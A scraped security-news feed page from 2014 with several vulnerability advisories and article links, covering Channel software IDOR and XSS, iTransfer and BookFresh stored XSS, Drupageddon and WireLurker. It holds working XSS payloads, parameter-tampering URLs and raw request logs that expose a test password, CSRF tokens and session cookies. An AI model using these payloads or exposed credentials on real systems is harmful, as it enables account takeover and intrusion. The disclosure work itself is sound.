Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

CVE-2014-8557 - JExperts Tecnologia - Channel Software Cross Site Scripting Issues

November 6, 2014, 3:21 pm
$
0
0
CVE-2014-8557 - JExperts Tecnologia / Channel Software Cross Site Scripting
Issues
Vendor Notified: 2014-10-27


INTRODUCTION:

The Channel Platform is an enterprise software project management (or
project management) developed by Brazilian company

JExperts Technology and present at thousands clients private enterprise and
government enterprise. This software consists of an integrated set of
solutions in the areas of strategy, projects and processes.


This problem was confirmed in the following versions of the Channel, other
versions maybe also affected.

Version: 5.0.33_CCB


DETAILS:

The Channel software is affected by Multiple Stored Cross Site Scripting.
The variable "usuario.nome" in page
".../channel/usuario.do?action=editarUsuario&id=XXX", accessible in menu
"Ferramentas" and submenu "alterar dados pessoais", and the variable
"titulo.form" in page "...channel/ticket.do?action=novoChamado", accessible
in menu "[incluir solicitação...]" do not sanitize input data, allowing
attacker to store malicious javascript code in a page.



CREDITS:

This vulnerability was discovered and researched by Luciano Pedreira
(a.k.a. shark)
Search

CVE-2014-8558 - JExperts Tecnologia - Channel Software Escalation Access Issues

November 6, 2014, 3:22 pm
$
0
0
CVE-2014-8558 - JExperts Tecnologia / Channel Software Escalation Access
Issues
Vendor Notified: 2014-10-27


INTRODUCTION:

The Channel Platform is an enterprise software project management (or
project management) developed by Brazilian company JExperts Technology and
present at thousands clients private enterprise and government enterprise.
This software consists of an integrated set of solutions in the areas of
strategy, projects and processes.


This problem was confirmed in the following versions of the Channel, other
versions maybe also affected.

Version: 5.0.33_CCB


DETAILS:

The Channel software is affected by Escalation Access. The variables
"action" and "key" can be manipulate by the GET method (passing parameters
at the URL itself), where a user, with restricted access, such as "read
only", can realize access to any other request of the call center of a user
other than him and even create or edit existing content posted of other
users.

A logged with any user at the system, just change the parameter of the
action ("action" variable) and the value of the key ("key" variable) to be
manipulated to get unauthorized access to the areas of others users.


Examples:

[1] set action to "acompanhar" and key to "201"
http://<server>/channel/ticket.do?action=acompanhar&key=201


[2] set action to "editar" and key to "100"
http://<server>/channel/ticket.do?action=editar&key=100



CREDITS:

This vulnerability was discovered and researched by Luciano Pedreira
(a.k.a. shark)

Drupageddon vs. Suhosin

November 6, 2014, 3:23 pm
$
0
0
 Automated attacks began compromising Drupal 7 websites that were not patched or updated to Drupal 7.32 within hours of the announcement of SA-CORE-2014-005 - Drupal core - SQL injection. You should proceed under the assumption that every Drupal 7 website was compromised unless updated or patched before Oct 15th, 11pm UTC, that is 7 hours after the announcement.


Is this statement true? Would all sites be vulnerable to these automated attacks? What if Suhosin is installed, which kills many general attack vectors. The short answer is that it kills all the PoCs, which we saw in the internet and that have been reported, but a dedicated attacker can navigate around Suhosin and still exploit this bug


more here.........http://www.sektioneins.de/en/blog/14-11-06-drupageddon-vs-suhosin.html

Tech Support website infects your computer before you even dial in

November 6, 2014, 6:22 pm
$
0
0
If you ever need help with your computer you may be interested in remote tech support.

As we have written many times on this blog before, the road to finding a legitimate company is very treacherous.

more here.........https://blog.malwarebytes.org/exploits-2/2014/11/tech-support-website-infects-your-computer-before-you-even-dial-in/

System Calls Make the World Go Round

November 7, 2014, 12:47 am
$
0
0
I hate to break it to you, but a user application is a helpless brain in a vat

Every interaction with the outside world is mediated by the kernel through system calls. If an app saves a file, writes to the terminal, or opens a TCP connection, the kernel is involved. Apps are regarded as highly suspicious: at best a bug-ridden mess, at worst the malicious brain of an evil genius.

more here..........http://duartes.org/gustavo/blog/post/system-calls/

WireLurker for Windows

November 7, 2014, 12:49 am
$
0
0
Yesterday we published a whitepaper introducing WireLurker, the first malware attacking both non-jailbroken and jailbroken iOS devices from a Mac OS X system. Shortly after we released the paper, Jaime Blasco from AlienVault Labs notified us that he’d found a Windows executable file that contains WireLurker’s command and control server address. We analyzed and investigated the sample and have confirmed that it is an older version of WireLurker.

more here..........http://researchcenter.paloaltonetworks.com/2014/11/wirelurker-windows/

SeasonApps iTransfer 1.1 - Persistent UI Vulnerability

November 7, 2014, 5:33 am
$
0
0
Document Title:
===============
SeasonApps iTransfer 1.1 - Persistent UI Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1347


Release Date:
=============
2014-10-27


Vulnerability Laboratory ID (VL-ID):
====================================
1347


Common Vulnerability Scoring System:
====================================
2.5


Product & Service Introduction:
===============================
Do you want to access your PhotoLibrary`s file on the website? Do you want to transfer files from PC to iDevice easily and
read or send them every where? So the iTransfer will give all these to you.

1. You can get all photos and videos in the Photo Library of your device.
2. Wifi Sharing! These make our life more easy, Isn`t it?
3.A file box for you that you can store and get files on the document dictionary of the App. also you can manage the files via Wifi Sharing !
4. Supper File Manager, you can open files with document format as pdf,doc,ppt,txt,rtf,png,jpg… and media format as mp3,mp4 and so on.
5.Zip and Unzip which will make you manage your local files early.
6.You can share the files to your friend with email.
7. You can access the files on this app via USB and iTunes.
8.Support for iOS7
9.Add upload feature to Library sharing, you can upload image to your photo library now.
10.Add file manage feature to the Local Sharing, just like create dictionary and delete files(dictionary)
11.Add Authentication feature to he sharing feature, you can safe browse your sharing right now!
12.Add feedback feature, please give us your advice or your bug to us. thanks!

(Copy of the Homepage: https://itunes.apple.com/us/app/itransferpro-transfer-photos/id777151284 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official iTransferPro v1.1 iOS mobile application.


Vulnerability Disclosure Timeline:
==================================
2014-10-27:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
SeasonApps iTransfer
Product: iTransfer - iOS Mobile Web Application (Wifi) 1.1


Exploitation Technique:
=======================
Local


Severity Level:
===============
Medium


Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official SeasonApps iTransferPro v1.1 iOS mobile application.
The vulnerability allows a local attacker to inject own script code as payload to the application-side of the vulnerable service function or module.

The vulnerability is located in the albumname value. Local attackers with low privileged device user accounts are able to manipulate the albumname
values by usage of the wifi sync function in the `Share Photo Library` module. The attack vector is persistent on the application-side and the request
method to inject is a app sync. The issue allows to stream persistent malicious script codes to the front site of the wifi photo library interface.

The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.5.
Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low or medium user interaction.
Successful exploitation of the vulnerabilities result in persistent phishing mails, session hijacking, persistent external redirect to malicious
sources and application-side manipulation of affected or connected module context.

Request Method(s):
                                        [+] Sync

Vulnerable Module(s):
                                        [+] Share Photo Library

Vulnerable Parameter(s):
                                        [+] items - group (albumname)

Affected Module(s):
                                        [+] Wifi Interface - Share Photo Library Index (http://localhost:8888/)


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by local attackers with low privileged device user account and low or medium user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: Wifi Interface - Share Photo Library Index (http://localhost:8888/)

<html><head><meta name="viewport" content="width=device-width, initial-scale=1.0" http-equiv="Content-Type"><title>iTransfer</title><style>html
{background-color:#eeeeee} body { background-color:#FFFFFF; font-family:Tahoma,Arial,Helvetica,sans-serif; font-size:18x; margin-left:5%;
margin-right:5%; border:3px groove #006600; padding:15px; } </style></head><body><h2>Enjoy  iTransfer</h2>
<bq>You Can Access Files of your Photo Library Now :)</bq><script type="text/javascript" src="/jquery.js"></script>
<script type="text/javascript" src="/fileuploader.js"></script>         <link href="fileuploader.css" rel="stylesheet"
type="text/css"><p></p><div id="file-uploader-div"><div class="qq-uploader"><div style="display: none;" class="qq-upload-drop-area">
<span>drop files here to upload</span></div><div style="position: relative; overflow: hidden; direction: ltr;" class="qq-upload-button">upload a file
<input style="position: absolute; right: 0px; top: 0px; font-family: Arial; font-size: 118px; margin: 0px; padding: 0px; cursor: pointer; opacity: 0;"
name="file" multiple="multiple" type="file"></div><ul class="qq-upload-list"></ul></div></div><p></p><script language="javascript">
$(function(){                               var uploader = new qq.FileUploader({
element:document.getElementById("file-uploader-div"),
 action: "/",
debug: false,
allowedExtensions: ["jpg","png","JPG","PNG","bmp","BMP"],
template: '<div class="qq-uploader">' +
'<div class="qq-upload-drop-area"><span>drop files here to upload</span></div>' +
'<div class="qq-upload-button">upload a file</div>' +
'<ul class="qq-upload-list"></ul>' +                                '</div>',                               });                               });
</script><br><label color="red"><font size="2" color="red">(Notice: The pictures you upload will appear when you share the photo library next time)</font></label>
<br><link href="/bootstrap.css" rel="stylesheet">         <script src="/bootstrap.min.js"></script><h3>All Groups</h3><ul class="thumbnails"><li class="span2">
<div class="thumbnail" style="text-align: center;">
<a target="_blank" href="/group/7BADE58E-C286-43D8-8CE2-4415C4DF35CA">
<img src="7BADE58E-C286-43D8-8CE2-4415C4DF35CA.png" height="150" width="150">
<span stype="white-space: nowrap;">>>"<[PERSISTENT INJECTED SCRIPT CODE EXECUTION!] 1items</span></a></div>
<a target="_blank" href="/group/7BADE58E-C286-43D8-8CE2-4415C4DF35CA">
</a></li><li class="span2"><a target="_blank" href="/group/7BADE58E-C286-43D8-8CE2-4415C4DF35CA">
</a><div class="thumbnail" style="text-align: center;"><a target="_blank" href="/group/7BADE58E-C286-43D8-8CE2-4415C4DF35CA">
</a><a target="_blank" href="/group/F8F7120B-9058-4B64-B6EF-59DB570F8872">
<img src="F8F7120B-9058-4B64-B6EF-59DB570F8872.png" height="150" width="150">
<span stype="white-space: nowrap;">Photos 3items</span>
</a></div><a target="_blank" href="/group/F8F7120B-9058-4B64-B6EF-59DB570F8872">
</a></li></ul></body></html>


Reference(s):
http://localhost:8888/
http://localhost:8888/group/


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction of the foldername/albumname input fields.
Encode the input and parse the output of the name values in the wifi interface to prevent persistent script code executions.


Security Risk:
==============
The security risk of the application-side input validation web vulnerability in the wifi interface is estimated as medium(-). (CVSS 2.5)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™



--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com

BookFresh - Persistent Clients Invite Vulnerability

November 7, 2014, 5:36 am
$
0
0
Document Title:
===============
BookFresh - Persistent Clients Invite Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1351


Release Date:
=============
2014-10-28


Vulnerability Laboratory ID (VL-ID):
====================================
1351


Common Vulnerability Scoring System:
====================================
3.9


Product & Service Introduction:
===============================
BookFresh is an innovative scheduling software program that sets the standard for 21st century appointment management and creation for small businesses.
Bookfresh connects small business owners and customers instantly. As a small business owner, you already know that a strong work ethic and uncompromised
customer service is the key to building a solid client base, but sometimes a little magic and innovation is all you need to watch your profits soar.
The BookFresh scheduling software offers scheduling solutions directly to service professionals and service brands, as well as APIs, enterprise services
and reseller solutions to online publishers who have a presence with an SMB audience.

Let BookFresh Work for You! Whether you are a handyman, a sales consultant, a personal trainer or even a pet sitter, BookFresh knows that the key to your
success is making it easy for clients to schedule appointments with you. We live in a 24/7 world, which means that sometimes potential clients, even
existing clients, want to be able to access your company at two o`clock in the morning. BookFresh makes this possible! The software we created makes it
easy to accept online appointments from new and existing clients. Whether you are interested in growing your small business or simply want to upgrade your
services for existing clients; our scheduling software can help you achieve these goals for your small business.

(Copy of the Vendor Homepage: https://www.bookfresh.com/about-us )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent encoding web vulnerability in the official BookFresh online payment web-application & api.


Vulnerability Disclosure Timeline:
==================================
2014-10-23: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-10-24: Vendor Notification (BookFresh Security Team - Bug Bounty Program)
2014-10-27: Vendor Response/Feedback (BookFresh Security Team - Bug Bounty Program)
2014-10-28: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
BookFresh LLC
Product: BookFresh - Web Application & API 2014 Q4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation & mail encoding vulnerability has been discovered in the official BookFresh web-application & api.
The vulnerability allows a remote attacker to inject own malicious script codes to the application-side of the vulnerable service module.

The security vulnerability is located in the `phone`,`from` and `message` input values of the `cindex.php/clients` module. Remote attackers
are able to perform a PUT request to execute persistent script codes in bookfresh service notification mails. The attackers registers an user
account and is able to execute script codes in the invite people notification mails of the bookfresh service. The attack vector of the issue
is on the application-side of the online-service and the request method to inject the code is `PUT`.

The security risk of the persistent vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9.
Exploitation of the vulnerability requires a low privileged application user account and low user interaction. Successful exploitation of the
vulnerability results in session hijacking, persistent phishing attacks, persistent external redirect via mail and persistent manipulation of
affected or connected module context.

Vulnerable Module(s):
                                [+] Index > Add Clients (Invite)

Vulnerable Parameter(s):
                                [+] phone
                                [+] from
                                [+] message

Affected Service(s):
                                [+] Invite Mail Notification Service (noreply@bookfresh.com)


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Vulnerable Module:      Index > Add Clients (Invite)
Vulnerable URL:         https://www.bookfresh.com/cindex.php/clients#9f29673d878097fd23de3bae1523da44

Test Account:           bkm@evolution-sec.com
Test Password:          chaos666
Date/Time:              24.10.2014 14:35-14:50

Manual steps to reproduce the security vulnerability ...
1. Register an account and login to the bookfresh online-service application
2. Open the client add module to invite another user account
3. Inject your own script code payload to the phone, message and from input fields
4. Send the invite to another bookfresh user or to a random email user account by usage of the save function
Note: After the PUT request the injected script code in the vulnerable values bypass the validation through the bookingfresh api
5. The target mailbox gets a notify of the bookfresh service mail (noreply@bookfresh.com) thats executes the script code on the application-side in the vulnerable values context
6. Successful reproduce of the application-side (persistent) security vulnerability!


PoC: Exploit

<table class="mainframe">
<tbody>
<tr>
<td align="center">
<table border="0" cellspacing="20" cellpadding="0" width="580" bgcolor="#ffffff">
<tbody><tr><td class="mainbar" align="left" valign="top">
<!-- This  mail body use in profile when we send message to customer by the click of the 'send'button and it the format of
body is changed while working on ready book proj and backup is on svn before date 1 june 2007 and on developer manish tomar's local system-->

Hi <img src=x onerror=alert(/PTEST/)</script> <img src=x onerror=alert(/PTEST/)</script>,               # Username is secure encoded!
<br /><br />You have received a new Customer Message from your BookFresh profile page.
<br /><table>  <tr>
    <td align=right>From: </td><td>>"<%20 <img src=x onerror=alert(/PTEST/)</script></td>               # wrong encoded!
  </tr><tr><td align=right>Email: </td><td>admin@vulnerability-lab.com</td>
  </tr><tr>
    <td align=right>Phone: </td><td>>"<%20 <img src=x onerror=alert(/PTEST/)</script></td>              # wrong encoded!
  </tr><tr><td align=right>Message: </td><td>>"<%20 <img src=x onerror=alert(/PTEST/)</script></td>     # wrong encoded!
  </tr></table>
<br /><br /></td></tr></tbody></table></td></tr><tr>
<td align="center">
<span style="font-size: 8pt; color: #808080; font-family: arial">Questions? Contact us at <a class="footer_link"
href="http://support.bookfresh.com/customer/portal/emails/new?utm_campaign=bf_trans%3A%3A14-Oct-24&utm_source=send_message&utm_medium=email">Customer Support</a>.<br />
Booking Services provided by © BookFresh, LLC</span><br/>
<span style="font-size: 8pt; color: #808080; font-family: arial"><a class="footer_link" href="privacy.html">Read</a> the BookFresh Privacy Policy.</span><br/>
<span style="font-size: 8pt; color: #808080; font-family: arial"><a class="footer_link" href="index.html?view=opt_out">Click here to unsubscribe, or be removed,</a> from our email list.</span><br/>
<span style="font-size: 8pt; color: #808080; font-family: arial">BookFresh and the BookFresh Logo are registered trademarks of <span>BookFresh, LLC.</span></span><br/>
</td></tr></tbody></table>
<!-- tname: email_SendMessage.tpl tid: 26 tab: A send date: 2014-10-24-->
<img src="http://email.bookfresh.com/wf/open?upn=uY64WvidYmA-2BK5R2ZgrqaysavcJU6rIwi-2BTH2m-2BnvrF7gIIWPH8UWHQ5IPkwAumsOQpAjYk9iXfKleJZs4F5L-2FrbX5cy6kOq-2F-2BgLKDDRdr0RsDKQLFl-2FONiWVLGGjc6Q9CXiSP5cPniDQsO7skfUHsaYZHVjrca69HQVChE7UbhbTtoTNujSdCVKJShEWbpQZ-2Bfw85nmnSDkQRQZxQjW2OE1c9m8t3c60RvypYObWH3rBpE0z11TXmjvuWNW3D4Q" alt="" width="1" height="1"
border="0" style="height:1px !important;width:1px !important;border-width:0 !important;margin-top:0 !important;margin-bottom:0 !important;margin-right:0 !important;margin-left:0
!important;padding-top:0 !important;padding-bottom:0 !important;padding-right:0 !important;padding-left:0 !important;"/>
</body>
</html>
</body>
</html>


--- PoC Session Logs [PUT] (Phone, Message & Email Values) ---
15:29:24.953[936ms][total 936ms] Status: 200[OK]
PUT https://www.bookfresh.com/cindex.php/backbone_api/clients/9f29673d878097fd23de3bae1523da44 Load Flags[LOAD_BACKGROUND  ] Größe des Inhalts[656] Mime Type[application/json]
   Request Header:
      Host[www.bookfresh.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/json; charset=UTF-8]
      X-CSRF-Token[dd5d7d46c5aa14d736fab7accaa26892]
      X-Requested-With[XMLHttpRequest]
      Referer[https://www.bookfresh.com/cindex.php/clients]
      Content-Length[1566]
      Cookie[exp_last_visit=1098793409; exp_last_activity=1414153682; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22pricing%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; exp_stashid=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A40%3A%22a6f1b5568526e667fc23b9df8b909c4033ccd4d9%22%3Bs%3A2%3A%22dt%22%3Bi%3A1414153409%3B%7D; __utma=172549936.1040555376.1414153707.1414153707.1414154524.2; __utmc=172549936; __utmz=172549936.1414154524.2.2.utmcsr=send_invite|utmccn=bf_trans::14-Oct-24|utmcmd=email; PHPSESSID2=fba6f3efafeba128a152ccac7f385a62; optimizelySegments=%7B%7D; optimizelyEndUserId=oeu1414153426800r0.9022819634031048; optimizelyBuckets=%7B%7D; user_segment=Prospect; 0=; 1=; ci_csrf_token=dd5d7d46c5aa14d736fab7accaa26892; hitlog_previous_view=ajax; ajs_user=%7B%22id%22%3A%22336105318%22%2C%22traits%22%3A%7B%22email%22%3A%22bkm%40evolution-sec.com%22%2C%22created%22%3A1414178914%2C%22firstName%22%3A%22%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(%2FPTEST%2F)%26lt%3B%2Fscript%26gt%3B%22%2C%22lastName%22%3A%22%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(%2FPTEST%2F)%26lt%3B%2Fscript%26gt%3B%22%2C%22AccountType%22%3A%22Freebie%22%2C%22Partner%22%3A%22Site%22%2C%22V2Enabled%22%3A%22yes%22%2C%22BusinessCategory%22%3A%22auto%22%7D%7D; StaffFilterActive=; FCView=agendaWeek; FCWeekends=true; wcsid=papxuKWK1AQ9pZOE4491G5P3JNLJ6b1T; hblid=ZjHg0Fr4qFgx2rsW4491G5P3JN8yLoJ1; _oklv=1414154886305%2CpapxuKWK1AQ9pZOE4491G5P3JNLJ6b1T; olfsk=olfsk7646853271129184; _okbk=cd4%3Dtrue%2Cvi5%3D0%2Cvi4%3D1414153790074%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=9558-780-10-9044; kvcd=1414154695823; km_ai=wRxGgAKNuV%2F1hVqbidBhjL91IRg%3D; km_uq=; km_lv=x; mp_2197551b77685f5afde96bfaeb663423_mixpanel=%7B%22distinct_id%22%3A%20%22149421cca1bb15-04ab1d7c297b6f8-41534336-1fa400-149421cca1ca98%22%2C%22Site%22%3A%20%22v3%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2Fhackerone.com%2Fbookfresh%22%2C%22%24initial_referring_domain%22%3A%20%22hackerone.com%22%2C%22__alias%22%3A%20%22336105318%22%2C%22mp_name_tag%22%3A%20%22bkm%40evolution-sec.com%22%2C%22AccountType%22%3A%20%22Freebie%22%2C%22Partner%22%3A%20%22Site%22%2C%22V2Enabled%22%3A%20%22yes%22%2C%22BusinessCategory%22%3A%20%22auto%22%2C%22%24created%22%3A%20%222014-10-24T19%3A28%3A34.000Z%22%2C%22%24email%22%3A%20%22bkm%40evolution-sec.com%22%2C%22%24first_name%22%3A%20%22%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(%2FPTEST%2F)%26lt%3B%2Fscript%26gt%3B%22%2C%22%24last_name%22%3A%20%22%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(%2FPTEST%2F)%26lt%3B%2Fscript%26gt%3B%22%7D]
      Connection[keep-alive]
   POST-Daten:
      {"id":"9f29673d878097fd23de3bae1523da44","deleted":"0","date_entered":"2014-10-24 05:43:12","date_modified":"2014-10-24 12:43:00","mask_flags":"0","email":"submit@vulnerability-lab.com","encrypted_password":null,"is_valid":"0","is_merchant":"0","first_name":"<img src[x onerror=alert(/PTEST/)</script>","last_name":"<img src=x onerror=alert(/PTEST/)</script>","birthday":"1973-10-23T22:00:00.000Z","company_name":"<img src=x onerror=alert(/PTEST/)</script>","address1":"<img src=x onerror=alert(/PTEST/)</script>","address2":null,"city":"blabla","state":"","country":null,"zipcode":"23451","phone":"46436436","cellphone":"<img src=x onerror=alert(/PTEST/)</script>","phone_type":"0","cellphone_type":"0","paypal_userid":null,"owner_id":"459c17cba4ecf98084e9a1f24d319144","private":"1","notes":"<img src=x onerror=alert(/PTEST/)</script>","timezone":"America/Los_Angeles","invited":"0","user_photo":null,"enabled":"1","reminder_emails_enable":"0","reminder_emails_time":"24","reminder_emails_text":null,"appt_emails_enable":false,"reminder_emails_merchant":"0","review_emails_enable":"1","review_emails_text":null,"act_type_id":"1","is_admin":"0","is_comp":"0","last_login":"2014-10-24 12:43:00","has_welcome_call":"0","user_photo_id":null,"is_affiliate_invitee":"0","email_bounced":"0","email_bounce_date":"0000-01-01 00:00:00","is_mobile":"0","reviews_by_rating":"0","reminder_sms_enable":"0","reset_password_token":null,"reset_password_sent_at":null,"remember_created_at":null,"uid":null,"failed_attempts":"0","locked_at":null,"appt_sms_enable":false,"actions":[]}]
   Response Header:
      Server[nginx/1.4.4]
      Date[Fri, 24 Oct 2014 13:29:37 GMT]
      Content-Type[application/json]
      Content-Length[656]
      Connection[keep-alive]
      X-Powered-By[PHP/5.3.28]
      Set-Cookie[ci_csrf_token=dd5d7d46c5aa14d736fab7accaa26892; expires=Fri, 24-Oct-2014 15:29:37 GMT; path=/; httponly]
      p3p[CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      status[200]
      Vary[Accept-Encoding,User-Agent]
      Content-Encoding[gzip]

15:29:26.325[321ms][total 321ms] Status: 200[OK]
GET https://www.bookfresh.com/cindex.php/backbone_api/clients/find?query=&offset=0 Load Flags[LOAD_BACKGROUND  ] Größe des Inhalts[1012] Mime Type[application/json]
   Request Header:
      Host[www.bookfresh.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[*/*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-CSRF-Token[dd5d7d46c5aa14d736fab7accaa26892]
      X-Requested-With[XMLHttpRequest]
      Referer[https://www.bookfresh.com/cindex.php/clients]
      Cookie[exp_last_visit=1098793409; exp_last_activity=1414153682; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22pricing%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; exp_stashid=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A40%3A%22a6f1b5568526e667fc23b9df8b909c4033ccd4d9%22%3Bs%3A2%3A%22dt%22%3Bi%3A1414153409%3B%7D; __utma=172549936.1040555376.1414153707.1414153707.1414154524.2; __utmc=172549936; __utmz=172549936.1414154524.2.2.utmcsr=send_invite|utmccn=bf_trans::14-Oct-24|utmcmd=email; PHPSESSID2=fba6f3efafeba128a152ccac7f385a62; optimizelySegments=%7B%7D; optimizelyEndUserId=oeu1414153426800r0.9022819634031048; optimizelyBuckets=%7B%7D; user_segment=Prospect; 0=; 1=; ci_csrf_token=dd5d7d46c5aa14d736fab7accaa26892; hitlog_previous_view=ajax; ajs_user=%7B%22id%22%3A%22336105318%22%2C%22traits%22%3A%7B%22email%22%3A%22bkm%40evolution-sec.com%22%2C%22created%22%3A1414178914%2C%22firstName%22%3A%22%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(%2FPTEST%2F)%26lt%3B%2Fscript%26gt%3B%22%2C%22lastName%22%3A%22%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(%2FPTEST%2F)%26lt%3B%2Fscript%26gt%3B%22%2C%22AccountType%22%3A%22Freebie%22%2C%22Partner%22%3A%22Site%22%2C%22V2Enabled%22%3A%22yes%22%2C%22BusinessCategory%22%3A%22auto%22%7D%7D; StaffFilterActive=; FCView=agendaWeek; FCWeekends=true; wcsid=papxuKWK1AQ9pZOE4491G5P3JNLJ6b1T; hblid=ZjHg0Fr4qFgx2rsW4491G5P3JN8yLoJ1; _oklv=1414154886305%2CpapxuKWK1AQ9pZOE4491G5P3JNLJ6b1T; olfsk=olfsk7646853271129184; _okbk=cd4%3Dtrue%2Cvi5%3D0%2Cvi4%3D1414153790074%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=9558-780-10-9044; kvcd=1414154695823; km_ai=wRxGgAKNuV%2F1hVqbidBhjL91IRg%3D; km_uq=; km_lv=x; mp_2197551b77685f5afde96bfaeb663423_mixpanel=%7B%22distinct_id%22%3A%20%22149421cca1bb15-04ab1d7c297b6f8-41534336-1fa400-149421cca1ca98%22%2C%22Site%22%3A%20%22v3%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2Fhackerone.com%2Fbookfresh%22%2C%22%24initial_referring_domain%22%3A%20%22hackerone.com%22%2C%22__alias%22%3A%20%22336105318%22%2C%22mp_name_tag%22%3A%20%22bkm%40evolution-sec.com%22%2C%22AccountType%22%3A%20%22Freebie%22%2C%22Partner%22%3A%20%22Site%22%2C%22V2Enabled%22%3A%20%22yes%22%2C%22BusinessCategory%22%3A%20%22auto%22%2C%22%24created%22%3A%20%222014-10-24T19%3A28%3A34.000Z%22%2C%22%24email%22%3A%20%22bkm%40evolution-sec.com%22%2C%22%24first_name%22%3A%20%22%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(%2FPTEST%2F)%26lt%3B%2Fscript%26gt%3B%22%2C%22%24last_name%22%3A%20%22%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(%2FPTEST%2F)%26lt%3B%2Fscript%26gt%3B%22%7D]
      Connection[keep-alive]
   Response Header:
      Server[nginx/1.4.4]
      Date[Fri, 24 Oct 2014 13:29:14 GMT]
      Content-Type[application/json]
      Content-Length[1012]
      Connection[keep-alive]
      X-Powered-By[PHP/5.3.28]
      Set-Cookie[ci_csrf_token=dd5d7d46c5aa14d736fab7accaa26892; expires=Fri, 24-Oct-2014 15:29:14 GMT; path=/; httponly]
      p3p[CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
